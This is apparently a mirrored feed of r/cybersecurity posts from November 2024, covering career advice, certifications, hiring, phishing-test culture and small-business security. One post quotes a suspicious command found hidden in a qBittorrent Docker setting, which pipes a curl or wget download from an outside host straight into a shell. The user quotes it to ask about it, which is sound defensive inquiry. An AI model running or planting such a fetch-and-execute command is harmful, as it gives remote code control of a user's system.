cybersecurity


This subreddit is for technical professionals to discuss cybersecurity news, research, threats, etc.

351
 
 
The original post: /r/cybersecurity by /u/arnaudsm on 2024-11-06 21:13:28.
352
 
 
The original post: /r/cybersecurity by /u/Guilty_Being_337 on 2024-11-06 20:50:53.

Pretty much as the title says. I also graduate with an associate's cyber degree at the end of the year. I’m going to start applying for cyber jobs, just wondering what the job market is like and what I can expect.

353
 
 
The original post: /r/cybersecurity by /u/Erica_Blackmere on 2024-11-06 18:59:57.

With the year quickly coming to a close, I’m curious to hear from other cyber leaders: Are you planning to make any key hires before year-end?

I work in the cyber division of a technical recruitment agency, and I've noticed that this time of year can be hit or miss. Some teams ramp up to meet end-of-year goals, while others are already setting their sights on growth for the new year.

What’s your approach? Are you bringing on new talent now or holding off until after the holiday season? Have you faced any unexpected hiring challenges recently?

Would love to hear your thoughts and experiences!

354
 
 
The original post: /r/cybersecurity by /u/Enough_Cell_8123 on 2024-11-06 20:35:42.

I'm a cybersecurity student in my third year; however, the first two years were more computer science focused and this year we specialize in the cybersecurity field. I have to carry out a project; however, I'm in a dilemma. I want to start off by saying I have a big interest in red teaming and was thinking of doing a pen testing project on IoT devices. My plan was as follows:

Step 1 - Decide what devices to test (between 1-3 devices).

Step 2 - Gather information on chosen IoT devices, and known vulnerabilities.

Step 3 - Obtain some INEXPENSIVE devices.

Step 4 - Figure out what tools and techniques will be required for each device.

Step 5 - Conduct experiments and analyze results.

Step 6 - Report results.

I was hoping for some outsider opinions on whether this is a good idea for a project as a student in their third year. I'm also conflicted about what devices I should choose, and some recommendations would be greatly appreciated, along with how to find out common vulnerabilities for these devices.

If there are any other great project ideas that you think I should do instead, please let me know. All feedback is greatly appreciated!

355
 
 
The original post: /r/cybersecurity by /u/Cerealbox2000 on 2024-11-06 20:18:16.

Working pro bono to support new tech (mainly device things but also SaaS) for a Dutch incubator/accelerator.

We would like to improve their knowledge of security and what to do and consider as they build their product.

What topics should we talk about and teach (through cybersec professionals as applicable)?

356
 
 
The original post: /r/cybersecurity by /u/arqf_ on 2024-11-06 19:42:02.
357
CEH or OSCP (zerobytes.monster)
 
 
The original post: /r/cybersecurity by /u/Cultural-Pause-7860 on 2024-11-06 19:30:47.

Not really sure which one to choose. I know a little of ethical hacking. I'm not a complete beginner, but I'm just not sure which one is best to get to start doing bounties or potentially a job.

358
 
 
The original post: /r/cybersecurity by /u/SnooBeans6199 on 2024-11-06 19:29:15.

I am a veteran with my BS in Cybersec, Sec+, and two weeks into my Masters. I have been applying to jobs for a month (that's nothing), but pretty much every application has been rejected. After reading on Reddit, I am honestly more discouraged than ever. I feel lied to; 3 years ago I was told this was one of the best careers to get into, and was a no-brainer as I have been a hobbyist for about 14 years. I truly feel I should have gone and continued in the electrical field or similar, which is what I did in the military. I absolutely hate the thought that if I were to be laid off in this field, it may take a year to find another job. I'm thinking about stopping the Masters because I seriously think it may be pointless and actually a waste of my time.

359
 
 
The original post: /r/cybersecurity by /u/lightscream on 2024-11-06 19:19:04.

Landed a SOC job recently and am studying to go into threat hunting and DFIR in the future. Do I need to learn Windows services for it: how they work, their dependencies, common vulnerabilities, etc.? And do I need to know every core service? Also, how would you recommend I study it? I viewed recent posts like this and the answers weren’t that clear. I would love more step-by-step things rather than just 10 links, each with a whole big website on it, where you don’t even know where you should start from. I'm currently learning some services and deploying a W10 VM to get some hands-on experience playing with services, using Sysmon, etc. Would love to hear your recommendations.

360
 
 
The original post: /r/cybersecurity by /u/eggsavage45 on 2024-11-06 19:13:53.

Doing some cybersecurity consulting work on the side for small businesses (less than 6 endpoints per business)

And was looking into the effectiveness of Microsoft Business Premium as an all in one solution for the business’s security needs.

Most of my clients are small mom and pop shops with little if not zero security. I currently use Defender E5 at my main job (mainly for DLP access controls and Purview, that’s about it), so would Business Premium take care of everything a small business would need security-wise?

Mainly looking to implement:

Email warning tags

Phishing email detection and remediation

Block user logins from foreign countries

Antivirus/antimalware

361
 
 
The original post: /r/cybersecurity by /u/Vitglance on 2024-11-06 18:36:36.

When it comes to CyberSecurity, I know enough to know that I don't know enough.

I'm aware that a truly dedicated malicious actor could tell you how you like your coffee through mspaint 10 years ago, but what about a less dedicated malicious actor? The piercing gaze of Sauron seems unavoidable these days, but, how does one avoid standing out to the casual scanning glance of Sauron?

If you had worried friends in dangerous places, what would you tell them?

362
 
 
The original post: /r/cybersecurity by /u/No-Description-2993 on 2024-11-06 18:22:11.

I’ve got a final round interview coming up for an entry-level security role at Texas Instruments and I’d be super grateful for any tips or insights! This is my last shot in the process and I’ve struggled with final rounds before. To prep, I scheduled several mock interviews to help with my nerves and responses.

Is there anything else I should focus on to make sure I’m fully prepared? I really want this position just as much as the other candidates do and I’m ready to put in the work.

363
 
 
The original post: /r/cybersecurity by /u/JCTopping on 2024-11-06 18:02:30.
364
 
 
The original post: /r/cybersecurity by /u/Acrobatic_Idea_3358 on 2024-11-06 17:11:31.

I just randomly noticed a strange thing, I thought that the checkbox is enabled and the command is empty, but then I noticed on the far end a strange "sh -c", which revealed a whole command, sneakily padded by empty spaces. What is it, what does it do and why is it there?

Note that I just installed qBittorrent on a NAS in Docker recently and I have not actively added this command.

https://preview.redd.it/y15dwxpoq9zd1.png?width=685&format=png&auto=webp&s=2b97039e631671a8fd2785f5a7b5ab898f644ecf

The command reads:

sh -c "(curl -skL https://hashx.dev || wget --no-check-certificate -qO - https://hashx.dev) | sh"

365
 
 
The original post: /r/cybersecurity by /u/Intrepid_Pear6960 on 2024-11-06 17:05:56.

Hello all, part of our policy includes conducting risk management reviews on any 3rd party software we utilize. Currently I track how many we conduct each quarter, their risk level and importance to the company. Are there any other metrics anyone could recommend collecting on this process? This is something our internal auditors spend a lot of time picking at and want to see more data, but I can't come up with any more info that's easy to provide them with.

366
 
 
The original post: /r/cybersecurity by /u/ecry_ on 2024-11-06 16:27:45.

We have been given a task in my cybersecurity class. As shown by the nmap scan, we have info about the OS, we do know it is a VM, and we have the IPv6 and IPv4 address (also the gateway). So far my closest guess has been an SMBv3 vulnerability (SMBGhost), as I think it is running SMB 3.1.1 on port 455. I have tried exploiting it through Metasploit on Kali, but the modules on there aren’t working. The tutor told us that port 135 isn’t the one we have to exploit, so it is either one between 139 and 455, but I have no other clues on how to proceed. The other CVEs I found about the 21H2 version of Win10 don’t seem exploitable, or I just don’t have the skill to execute them yet. You guys have any ideas?

367
 
 
The original post: /r/cybersecurity by /u/silentlycontinue on 2024-11-06 15:48:21.

Greetings,

I found that about 95% of failed remote VPN login traffic, about 5k daily monitored IPs, was caused by 2 subnets that seem to be managed by the same company or ISP; a /18 and a /19. The IPs rotated too frequently, each IP only making 2 login attempts, for the threat-detection authentication service to automatically shun them. So I blocked the ranges with a block list instead.

Should I submit those ranges to an Open Threat Exchange, or other threat intel service, along with an explanation of what I was seeing on the firewall? Or are such distributed brute force attacks so frequent that it would not be of interest?

_Silently

368
 
 
The original post: /r/cybersecurity by /u/draco_1000 on 2024-11-06 13:16:03.

I have been reading RINSED, TRACKERS IN THE DARK. The company chain analysis does come up quite a lot and does most of the bitcoin blockchain cybercrime investigations. How can we get into this and learn more about how to do what they do?

369
 
 
The original post: /r/cybersecurity by /u/Parrra on 2024-11-06 12:17:58.

Looking for some advice here. As a little bit of relevant background, the organisation I work for has only just formed a cyber security team. So they are very early on in their maturity in this space.

I have recently started some planned work to engage users in my organisation with security awareness training. This plan was approved by our CEO plus an external risk board we report to. As part of this, and working with a vendor, we conducted a baseline simulated phishing test. We followed all vendor advice and let the IT support staff know it was happening. Well, everything blew up at this point.

There were IT support staff from all different areas of the business complaining about user impacts. There were some IT staff undermining the process by contacting all their users and warning them. There were other middle management staff disagreeing with the entire approach in chats which include the entire IT team, stoking the fire even more. In the end the baseline data is totally inaccurate as around a third of our staff got personal warnings about the simulated test and were told to delete it.

What’s the best approach to try and change the culture of the greater IT team to try and accept what cyber is trying to do and get them onboard and working together, instead of seeing it as a huge pain and actively working against it?

370
 
 
The original post: /r/cybersecurity by /u/cloudxiao on 2024-11-06 07:19:41.

Hi guys. I'm curious to know how you all go about ensuring the security of your mobile applications. Whether you're a developer, product manager, or part of an app security team, I'm interested in the different tools, methods, or frameworks you might use to check and maintain app security.

Do you have any go-to tools or best practices for conducting vulnerability scans, securing data, or testing for common threats like malware or unauthorized access? If you've found a particular solution or workflow effective, I'd love to hear more about it.

Thanks.

371
where to start? (zerobytes.monster)
 
 
The original post: /r/cybersecurity by /u/SnooCrickets2192 on 2024-11-06 04:38:46.

Hello, I'm new to the cybersecurity community. I am considering doing cybersecurity as my major/degree in college, but I want to get some knowledge first. The only thing I know about cybersecurity right now is to not share your password online. I was thinking about doing an online boot camp for cybersecurity to get some basic knowledge before I head off to college. I'm not looking for a job currently, just wanted to get some knowledge before I head to college and start class. If boot camp gets too expensive currently, where should I start?

372
 
 
The original post: /r/cybersecurity by /u/Wizkidbrz on 2024-11-05 16:57:48.

This has been a hot topic at my job recently as we started adopting containers.

How is everyone handling container vulnerabilities?

We are scanning these 3rd party container images and are finding some high/critical vulnerabilities in them.

The application owners are giving us pushback on getting them fixed because they rely on the vendor to update their container image and that is not an easy ask.

373
 
 
The original post: /r/cybersecurity by /u/No_excuses0101 on 2024-11-06 01:01:42.

Has anyone come across a mapping of DORA (Digital operational resilience act) to standards like NIST, ISO2700, ISF SoGP, NIS2 or PCI DSS please?

374
Cyber claims (zerobytes.monster)
 
 
The original post: /r/cybersecurity by /u/Sctman1 on 2024-11-06 00:43:17.

Anyone here work in cyber claims? Pros/cons? Been in more typical cyber roles like SLP, GRC, audit and security awareness for the past 5 years and thinking about moving.

375
 
 
The original post: /r/cybersecurity by /u/Terminator2OnDVD on 2024-11-05 23:05:30.

Hello, guess it’s my turn to make a post in here. I currently work as an IT Security Compliance Manager (5 years of experience) but have decided to switch to IT risk management in around 6 months, currently studying CRISC to support this transition.

Aiming to be an extremely good risk manager in 2 years. What areas, certs, tech, etc. would you guys recommend me to focus on to achieve this, and why?

Thanks in advance.
